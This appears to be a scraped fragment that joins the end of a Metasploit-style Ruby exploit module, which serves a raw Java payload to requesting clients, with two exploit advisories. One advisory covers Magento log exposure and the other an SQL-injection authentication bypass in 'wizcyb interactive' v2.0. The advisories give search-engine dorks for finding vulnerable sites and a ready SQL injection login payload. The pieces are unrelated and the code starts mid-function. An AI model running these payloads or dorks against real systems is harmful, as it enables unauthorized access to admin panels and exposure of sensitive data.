    # NOTE(review): Timeout is not required in this file; presumably loaded by the framework.
    Timeout.timeout(datastore['HTTPDELAY']) { super }
  rescue Timeout::Error
    # When the server stop due to our timeout, this is raised
  end

  # HttpServer callback: serves the raw Java payload for any requested URI
  # (the primer script fetches "#{get_uri}.jar").
  #
  # @param cli the client connection
  # @param request the incoming HTTP request
  def on_request_uri(cli, request)
    vprint_status("Sending payload for requested uri: #{request.uri}")
    send_response(cli, payload.raw)
  end

end
<pre><code>====================================================================================================================================<br />| # Title : Magento eCommerce v2.4.0 sensitive information disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | <br />| # Vendor : https://devdocs.magento.com/ | <br />| # Dork : Index of /var/log/ |<br />====================================================================================================================================<br /><br />poc : <br /><br /><br />[+] Log files are kept in an unprotected folder; the logs contain sensitive information such as folder paths, etc.<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] http://127.0.0.1/dawnfrozenfoods.com/var/log/<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : wizcyb interactive v2.0 auth bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) | <br />| # Vendor : https://www.wizcyb.com/products.php | <br />| # Dork : powered by wizcyb interactive |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Use Payload : user=1' or 1=1 -- - & pass=1' or 1=1 -- - <br /><br />[+] https://127.0.0.1/www/jobcapsindiacom/admin/<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>